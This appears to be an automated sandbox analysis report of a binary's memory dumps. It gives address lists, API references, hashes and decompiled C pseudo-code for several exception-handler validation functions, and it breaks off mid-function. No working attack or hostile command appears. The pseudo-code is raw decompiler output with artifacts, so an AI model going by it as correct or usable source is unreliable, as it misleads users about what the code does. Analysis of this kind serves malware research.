0x00cf9e9e
0x00cf9eae
0x00cf9eb1
0x00cf9ec3
0x00cf9ec6
0x00cf9ed4
0x00cf9ed7
0x00cf9ee9
0x00cf9eec
0x00cf9efe
0x00cf9f01
0x00cf9f15
0x00cf9f18
0x00cf9f2c
0x00cf9f2f
0x00cf9f43
0x00cf9f46
0x00cf9f5a
0x00cf9f5d
0x00cf9f71
0x00cf9f74
0x00cf9f88
0x00cf9f8d
0x00cf9f9f
0x00cf9fa2
0x00cf9fb6
0x00cf9fb9
0x00cf9fcd
0x00cf9fd0
0x00cf9fe6
0x00cf9fe9
0x00cf9ffd
0x00cfa000
0x00cfa012
0x00cfa015
0x00cfa029
0x00cfa02c
0x00cfa040
0x00cfa043
0x00cfa057
0x00cfa060
0x00cfa063
0x00cfa06c
0x00cfa075
0x00cfa07d
0x00cfa085
0x00cfa08f
0x00cfa0a4

APIs

memset.NTDLL ref: 00CFA098

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 50e1001d6c2c4e3c59974a9fb3ff68b46dee939a17525b2316b9db9958cb51ed
Instruction ID: 592bc3e876085523b54a297b34af8f1d801ae9ea4169e4f9b33adb3aa7aedfb7
Opcode Fuzzy Hash: 50e1001d6c2c4e3c59974a9fb3ff68b46dee939a17525b2316b9db9958cb51ed
Instruction Fuzzy Hash: AC22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 100022E5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100022E5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10004178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x100041c0 = 1;
										__eflags =  *0x100041c0;
										if( *0x100041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x10004178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x100041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10004178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1000417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x100041c0 = 1;
							__eflags =  *0x100041c0;
							if( *0x100041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x100041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10004178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x100022ef
0x100022f2
0x100022f8
0x10002316
0x00000000
0x10002316
0x10002300
0x10002309
0x1000230f
0x1000231e
0x10002321
0x10002324
0x1000232e
0x1000232e
0x10002330
0x10002333
0x10002335
0x10002335
0x10002337
0x1000233a
0x00000000
0x00000000
0x1000233c
0x1000233e
0x100023a4
0x100023a4
0x10002502
0x00000000
0x10002502
0x10002340
0x10002340
0x10002344
0x10002346
0x10002346
0x10002346
0x10002346
0x10002349
0x1000234a
0x1000234d
0x1000234d
0x10002351
0x10002355
0x10002363
0x10002363
0x1000236b
0x10002371
0x10002373
0x10002375
0x10002385
0x10002392
0x10002396
0x1000239b
0x1000239d
0x1000241b
0x1000241b
0x1000239f
0x1000239f
0x1000239f
0x1000241d
0x1000241f
0x10002500
0x10002500
0x00000000
0x10002425
0x10002425
0x1000242c
0x00000000
0x00000000
0x10002432
0x10002436
0x10002492
0x10002494
0x1000249c
0x1000249e
0x100024a0
0x00000000
0x00000000
0x100024a2
0x100024a8
0x100024aa
0x100024ac
0x100024c1
0x100024c1
0x100024c3
0x100024f2
0x100024f9
0x00000000
0x100024f9
0x100024c7
0x100024c8
0x100024ca
0x100024cc
0x100024cc
0x100024ce
0x100024d0
0x100024d2
0x100024e6
0x100024e6
0x100024e9
0x100024eb
0x100024eb
0x100024ec
0x100024ec
0x00000000
0x100024d4
0x100024d4
0x100024d4
0x100024dd
0x100024de
0x100024e0
0x100024e2
0x100024e2
0x00000000
0x100024d4
0x100024d2
0x100024ae
0x100024b5
0x100024b5
0x100024b7
0x00000000
0x00000000
0x100024b9
0x100024ba
0x100024bd
0x100024bf
0x00000000
0x00000000
0x00000000
0x100024bf
0x00000000
0x100024b5
0x10002438
0x1000243b
0x10002440
0x00000000
0x00000000
0x10002449
0x1000244b
0x10002451
0x00000000
0x00000000
0x10002457
0x1000245d
0x00000000
0x00000000
0x10002463
0x10002465
0x1000246e
0x10002472
0x00000000
0x00000000
0x10002478
0x1000247b
0x1000247d
0x00000000
0x00000000
0x10002484
0x10002486
0x00000000
0x00000000
0x10002488
0x1000248c
0x00000000
0x00000000
0x00000000
0x1000248c
0x00000000
0x00000000
0x00000000
0x10002377
0x10002377
0x10002377
0x1000237e
0x00000000
0x00000000
0x10002380
0x10002381
0x10002383
0x00000000
0x00000000
0x00000000
0x10002383
0x100023ab
0x100023ad
0x00000000
0x00000000
0x100023bd
0x100023bf
0x100023c1
0x00000000
0x00000000
0x100023c7
0x100023ce
0x100023fa
0x100023fa
0x100023fc
0x100023fe
0x10002412
0x10002414
0x00000000
0x00000000
0x00000000
0x00000000
0x10002400
0x10002400
0x10002400
0x10002409
0x1000240a
0x1000240c
0x1000240e
0x1000240e
0x00000000
0x10002400
0x100023d0
0x100023d3
0x100023d5
0x100023e7
0x100023e7
0x100023ea
0x100023ec
0x100023ec
0x100023ed
0x100023ed
0x100023f3
0x00000000
0x00000000
0x00000000
0x00000000
0x100023d7
0x100023d7
0x100023d7
0x100023de
0x00000000
0x00000000
0x100023e0
0x100023e0
0x100023e1
0x00000000
0x00000000
0x00000000
0x100023e1
0x100023e3
0x100023e5
0x100023f8
0x00000000
0x00000000
0x00000000
0x100023f8
0x00000000
0x100023e5
0x10002357
0x1000235a
0x1000235d
0x00000000
0x00000000
0x1000235f
0x10002361
0x00000000
0x00000000
0x00000000
0x10002361
0x10002326
0x10002328
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002396

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 1de5baaa245021cd83e1aca8b7c286a97892dc60720d7387bea766935d3f4ed5
Instruction ID: 13b1758f272d0efd37d9baa1937ac0e4df02586ae21dd3cdc5bdf1897abd2a50
Opcode Fuzzy Hash: 1de5baaa245021cd83e1aca8b7c286a97892dc60720d7387bea766935d3f4ed5
Instruction Fuzzy Hash: 3561DD70A00652DFFB59CB28CCD065933E5EB853D4B228479D846C729DEB34EE82CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00CFB2C1, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CFB2C1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xcfd2d8; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xcfd320 = 1;
										__eflags =  *0xcfd320;
										if( *0xcfd320 != 0) {
											goto L60;
										}
										_t84 =  *0xcfd2d8; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xcfd320 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xcfd2d8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xcfd2e0 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xcfd2dc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xcfd320 = 1;
							__eflags =  *0xcfd320;
							if( *0xcfd320 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xcfd320 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xcfd2e0 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xcfd2d8 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00cfb2cb
0x00cfb2ce
0x00cfb2d4
0x00cfb2f2
0x00000000
0x00cfb2f2
0x00cfb2dc
0x00cfb2e5
0x00cfb2eb
0x00cfb2fa
0x00cfb2fd
0x00cfb300
0x00cfb30a
0x00cfb30a
0x00cfb30c
0x00cfb30f
0x00cfb311
0x00cfb311
0x00cfb313
0x00cfb316
0x00000000
0x00000000
0x00cfb318
0x00cfb31a
0x00cfb380
0x00cfb380
0x00cfb4de
0x00000000
0x00cfb4de
0x00cfb31c
0x00cfb31c
0x00cfb320
0x00cfb322
0x00cfb322
0x00cfb322
0x00cfb322
0x00cfb325
0x00cfb326
0x00cfb329
0x00cfb329
0x00cfb32d
0x00cfb331
0x00cfb33f
0x00cfb33f
0x00cfb347
0x00cfb34d
0x00cfb34f
0x00cfb351
0x00cfb361
0x00cfb36e
0x00cfb372
0x00cfb377
0x00cfb379
0x00cfb3f7
0x00cfb3f7
0x00cfb37b
0x00cfb37b
0x00cfb37b
0x00cfb3f9
0x00cfb3fb
0x00cfb4dc
0x00cfb4dc
0x00000000
0x00cfb401
0x00cfb401
0x00cfb408
0x00000000
0x00000000
0x00cfb40e
0x00cfb412
0x00cfb46e
0x00cfb470
0x00cfb478
0x00cfb47a
0x00cfb47c
0x00000000
0x00000000
0x00cfb47e
0x00cfb484
0x00cfb486
0x00cfb488
0x00cfb49d
0x00cfb49d
0x00cfb49f
0x00cfb4ce
0x00cfb4d5
0x00000000
0x00cfb4d5
0x00cfb4a3
0x00cfb4a4
0x00cfb4a6
0x00cfb4a8
0x00cfb4a8
0x00cfb4aa
0x00cfb4ac
0x00cfb4ae
0x00cfb4c2
0x00cfb4c2
0x00cfb4c5
0x00cfb4c7
0x00cfb4c7
0x00cfb4c8
0x00cfb4c8
0x00000000
0x00cfb4b0
0x00cfb4b0
0x00cfb4b0
0x00cfb4b9
0x00cfb4ba
0x00cfb4bc
0x00cfb4be
0x00cfb4be
0x00000000
0x00cfb4b0
0x00cfb4ae
0x00cfb48a
0x00cfb491
0x00cfb491
0x00cfb493
0x00000000
0x00000000
0x00cfb495
0x00cfb496
0x00cfb499
0x00cfb49b
0x00000000
0x00000000
0x00000000
0x00cfb49b
0x00000000
0x00cfb491
0x00cfb414
0x00cfb417
0x00cfb41c
0x00000000
0x00000000
0x00cfb425
0x00cfb427
0x00cfb42d
0x00000000
0x00000000
0x00cfb433
0x00cfb439
0x00000000
0x00000000
0x00cfb43f
0x00cfb441
0x00cfb44a
0x00cfb44e
0x00000000
0x00000000
0x00cfb454
0x00cfb457
0x00cfb459
0x00000000
0x00000000
0x00cfb460
0x00cfb462
0x00000000
0x00000000
0x00cfb464
0x00cfb468
0x00000000
0x00000000
0x00000000
0x00cfb468
0x00000000
0x00000000
0x00000000
0x00cfb353
0x00cfb353
0x00cfb353
0x00cfb35a
0x00000000
0x00000000
0x00cfb35c
0x00cfb35d
0x00cfb35f
0x00000000
0x00000000
0x00000000
0x00cfb35f
0x00cfb387
0x00cfb389
0x00000000
0x00000000
0x00cfb399
0x00cfb39b
0x00cfb39d
0x00000000
0x00000000
0x00cfb3a3
0x00cfb3aa
0x00cfb3d6
0x00cfb3d6
0x00cfb3d8
0x00cfb3da
0x00cfb3ee
0x00cfb3f0
0x00000000
0x00000000
0x00000000
0x00000000
0x00cfb3dc
0x00cfb3dc
0x00cfb3dc
0x00cfb3e5
0x00cfb3e6
0x00cfb3e8
0x00cfb3ea
0x00cfb3ea
0x00000000
0x00cfb3dc
0x00cfb3ac
0x00cfb3ac
0x00cfb3af
0x00cfb3b1
0x00cfb3c3
0x00cfb3c3
0x00cfb3c6
0x00cfb3c8
0x00cfb3c8
0x00cfb3c9
0x00cfb3c9
0x00cfb3cf
0x00cfb3cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00cfb3b3
0x00cfb3b3
0x00cfb3b3
0x00cfb3ba
0x00000000
0x00000000
0x00cfb3bc
0x00cfb3bc
0x00cfb3bd
0x00000000
0x00000000
0x00000000
0x00cfb3bd
0x00cfb3bf
0x00cfb3c1
0x00cfb3d4
0x00000000
0x00000000
0x00000000
0x00cfb3d4
0x00000000
0x00cfb3c1
0x00cfb333
0x00cfb336
0x00cfb339
0x00000000
0x00000000
0x00cfb33b
0x00cfb33d
0x00000000
0x00000000
0x00000000
0x00cfb33d
0x00cfb302
0x00cfb304
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00CFB372

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: fd9099a50fa455978c527e373530f8e736734661954759eb43fea4e81f39fb81
Instruction ID: 4bf7fbc6b4a533b9d419e9dcef3af3f93a7fea54f22d486473ce7361191e8c6c
Opcode Fuzzy Hash: fd9099a50fa455978c527e373530f8e736734661954759eb43fea4e81f39fb81
Instruction Fuzzy Hash: 6661D73174060E8FDBA9CF29C98077977A6EB44354F248029DB16C76A6EB30DD4AC743

Uniqueness

Uniqueness Score: -1.00%

Function 00CFEC48, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69969da3e5f25e517399d62b05eaa08ebb0370a71e65700aaeab7bf355088135
Instruction ID: 28917c33e972d7e849404616ae49b67ced40a3452eb4f2b5b9f55cb3c8db3b58
Opcode Fuzzy Hash: 69969da3e5f25e517399d62b05eaa08ebb0370a71e65700aaeab7bf355088135
Instruction Fuzzy Hash: E241E476916292CFC71A8F78C8DA299FBB2FF0631135946CDC0D29F166C7326146CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00CFEC41, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c6ec9702789d8c300688549ffa4c1610bc1884ebbce0ad54c1bc9b0827d967
Instruction ID: 26d406924a3b394a99823ca2fef909a93921f6e5dbb8563635c3cf7f267aa8fc
Opcode Fuzzy Hash: d2c6ec9702789d8c300688549ffa4c1610bc1884ebbce0ad54c1bc9b0827d967
Instruction Fuzzy Hash: 8441F376916291CFC71ACF78C8DA6A5FBB2FF0631035946DDC092AF166C3226146CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 100020C4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E100020C4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E1000222B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E100022E5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
